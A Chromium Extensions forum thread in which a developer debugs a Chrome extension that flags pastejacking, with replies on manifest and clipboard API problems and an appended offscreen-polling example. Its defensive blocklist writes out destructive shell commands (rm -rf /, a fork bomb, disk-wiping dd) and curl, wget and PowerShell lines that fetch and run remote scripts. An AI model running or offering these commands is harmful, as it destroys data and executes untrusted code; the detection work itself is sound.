Chrome Extension Debugging


Shreeganesh Jadhav

May 13, 2024, 4:40:34 AM
to Chromium Extensions
So I'm making a Chrome extension which basically reads the clipboard contents and then tries to match it with the values in the array which is located in the background JS file. If the content matches, then it flags the user with the popup. Actually, it's my project for handling the Pastejacking vulnerability.
Here is my manifest file:
---------------------------------------------------------------------------------------------------
"manifest_version": 3,
    "name": "Anti PasteJacker",
    "description": "Detects malicious content copied to the clipboard.",
    "version": "1.0",
    "permissions": ["clipboardRead", "notifications"],
    "background": {
      "service_work er": "background.js",
      "type":"module"
    },
    "action": {
      "default_popup": "popup/popup.html",
      "default_icon": "images/hello_extensions.png"
    },
----------------------------------------------------------------------------------------------------------------

Here is the background file:
----------------------------------------------------------------------------------------------
const maliciousContent = [
    "echo \"evil\"",
    "rm -rf /",
    ":(){ :|: & };:",
    "mkfs.ext3 /dev/sda",
    "wget -q -O- http://example.com/malicious.sh | bash",
    "chmod -R 777 /",
    "dd if=/dev/zero of=/dev/sda",
    "sudo userdel -r username",
    'echo "malicious_code" > ~/.bash_profile',
    "cat /dev/urandom > /dev/sda",
    "mv /bin/bash /bin/sh",
    "sudo mv /etc/sudoers /dev/null",
    'echo "malicious_code" >> /etc/rc.local',
    "curl http://example.com/malicious.sh | sudo sh",
    ":(){ :|:& };: > /dev/null",
    "sudo rm -rf / --no-preserve-root",
    'echo "malicious_code" > /etc/passwd',
    "cat /dev/zero > /dev/sda",
    "sudo mv /bin/su /bin/disable_su",
    "rm -rf ~",
    'echo "alias sudo=\'rm -rf /\'">>.bashrc',
    "wget -O /tmp/malicious.sh http://example.com/malicious.sh && chmod +x /tmp/malicious.sh && /tmp/malicious.sh",
    "curl -sSL http://example.com/malicious.sh | bash",
    "bash -c \"$(curl -fsSL http://example.com/malicious.sh)\"",
    "curl http://example.com/malicious.php | php",
    "powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://example.com/malicious.ps1')\"",
    "echo \"$(curl -fsSL http://example.com/malicious.sh)\" | bash"
   
];

function isMalicious(content) {
    return maliciousContent.includes(content);
}

function handleClipboardChange() {
    chrome.clipboard.readText(function(clipboardContent) {
        if (isMalicious(clipboardContent)) {
            chrome.notifications.create({
                type: "basic",
                iconUrl: "hello_extensions.png",
                title: "Malicious Content Detected",
                message: "Something malicious is copied to your clipboard. Please check it out."
            });
        }
    });
}

chrome.clipboard.onChanged.addListener(handleClipboardChange);
---------------------------------------------------------------------------------------------------
and here is my popup.html:
------------------------------------------------------------------------------
<body>
    <div class="popup-container">
        <h2>Malicious Content Detected</h2>
        <p>Something malicious is copied to your clipboard. Please check it out.</p>
        <button id="closeButton">Close</button>
    </div>
    <script src="popup.js"></script>
</body>
-----------------------------------------------------------------------------------
and here is my popup.js file:
--------------------------------------------------------------------
function closePopup() {
    window.close();
}
document.getElementById("closeButton").addEventListener("click", closePopup);
------------------------------------------------------------------------------
I'm having trouble with the execution part:
1) I can't change the default favicon for the extension, even if I do so, it would lead to error in chrome://extension developer's mode
2) I can't load my background.js file
It would be a great help if someone can debug this :)

Oliver Dunk

May 13, 2024, 6:46:48 AM
to Shreeganesh Jadhav, Chromium Extensions
Hi Shreeganesh,

For the favicon, the default_icon key should be set to a dictionary of sizes. You can see an example here: https://developer.chrome.com/docs/extensions/reference/api/action#manifest

For the background file, a couple of notes:
  • In the files you shared here, the background.service_worker key has a space in it. Is this the case in your project?
  • The chrome.clipboard API is only available on ChromeOS and only on certain channels like Canary. Do you meet these conditions?
I'm actually not sure off the top of my head how easy it would be to create something like this - clipboard APIs are slowly moving towards requiring document focus and it's gradually getting harder to use some of the workarounds that were available in the past.

I'm sure there might be some clever solutions, but I couldn't find any with a quick play just now I'm afraid.
Oliver Dunk | DevRel, Chrome Extensions | https://developer.chrome.com/ | London, GB



wOxxOm

May 13, 2024, 10:13:30 AM
to Chromium Extensions, Oliver Dunk, Chromium Extensions, Shreeganesh Jadhav
The only workaround for chrome.clipboard API is bad: polling the clipboard periodically in the offscreen document using document.execCommand('paste') in a textarea element (example) and send the result via a message to the background script. 

wOxxOm

May 13, 2024, 10:19:58 AM
to Chromium Extensions, wOxxOm, Oliver Dunk, Chromium Extensions, Shreeganesh Jadhav
BTW "default_icon" doesn't have to be a dictionary with sizes, it can be a string. Note that if you want to change the icon of the extension itself you need to specify "icons" object (more info), which is not a part of "action".

>  it would lead to error in chrome://extension developer's mode

What is the exact text of the error?

Oliver Dunk

May 13, 2024, 10:36:07 AM
to wOxxOm, Chromium Extensions, Shreeganesh Jadhav
> BTW "default_icon" doesn't have to be a dictionary with sizes, it can be a string. Note that if you want to change the icon of the extension itself you need to specify "icons" object (more info), which is not a part of "action".

Oops, thanks! We should clarify that in the documentation. I thought it might be, but when I checked earlier I didn't see it anywhere and assumed I was making it up :)

> The only workaround for chrome.clipboard API is bad: polling the clipboard periodically in the offscreen document using document.execCommand('paste') in a textarea element (example) and send the result via a message to the background script.

Have you been able to get this working? I tried that this morning and it didn't seem to work, I assume maybe a focus issue with offscreen documents. 
Oliver Dunk | DevRel, Chrome Extensions | https://developer.chrome.com/ | London, GB

wOxxOm

May 13, 2024, 10:42:34 AM
to Chromium Extensions, Oliver Dunk, Chromium Extensions, Shreeganesh Jadhav, wOxxOm
Works for me:

let el = document.body.appendChild(document.createElement("textarea"));
let val;
el.focus();
setInterval(() => {
  document.execCommand("paste");
  if (el.value !== val) alert(val = el.value);
  el.value = '';
}, 1000);

Maybe you didn't add clipboardRead permission?
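
The workaround discussed in this thread (poll with document.execCommand("paste") in an offscreen document and message the result to the background script), wired together as an added example that is not part of any poster's message or the Chromium project's own code. The file names offscreen.html and offscreen.js, the "clipboard-changed" message type and all helper names are assumptions; createPoller and isMalicious are kept free of Chrome APIs so they can be exercised outside the browser.

```javascript
// Added example, not code from the thread. File names, the message shape and
// helper names are assumptions; the three sections live in separate files.
// ---- shared: pure change detection, testable outside Chrome ----
function createPoller(readClipboard, onChange) {
  let last; // last value reported to onChange
  return function tick() {
    const text = readClipboard();
    if (text === last) return false; // unchanged since the previous poll
    last = text;
    onChange(text);
    return true;
  };
}

// Exact match against the blocklist, as in the original post, after trimming:
// pastejacked text often carries a trailing newline so it runs when pasted.
function isMalicious(text, blocklist) {
  return blocklist.includes(String(text).trim());
}

// ---- offscreen.js: loaded by offscreen.html (hypothetical file names) ----
function startOffscreenPolling(intervalMs = 1000) {
  const el = document.body.appendChild(document.createElement("textarea"));
  const read = () => {
    el.value = "";
    el.focus();
    document.execCommand("paste"); // requires the "clipboardRead" permission
    return el.value;
  };
  const report = (text) => chrome.runtime.sendMessage({ type: "clipboard-changed", text });
  return setInterval(createPoller(read, report), intervalMs);
}

// ---- background.js: service worker; needs "offscreen" and "notifications" ----
async function startBackground(blocklist) {
  // Register the listener before any await so a message can wake the worker.
  chrome.runtime.onMessage.addListener((msg) => {
    if (msg?.type !== "clipboard-changed" || !isMalicious(msg.text, blocklist)) return;
    chrome.notifications.create({ type: "basic", iconUrl: "images/hello_extensions.png",
      title: "Malicious Content Detected", message: "Check what was copied before pasting it." });
  });
  const open = await chrome.runtime.getContexts({ contextTypes: ["OFFSCREEN_DOCUMENT"] });
  if (open.length > 0) return; // an offscreen document is already polling
  await chrome.offscreen.createDocument({
    url: "offscreen.html",
    reasons: ["CLIPBOARD"],
    justification: "Poll the clipboard to warn about known dangerous commands",
  });
}
```

offscreen.js calls startOffscreenPolling() and background.js calls startBackground(maliciousContent) at the top level of each file.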
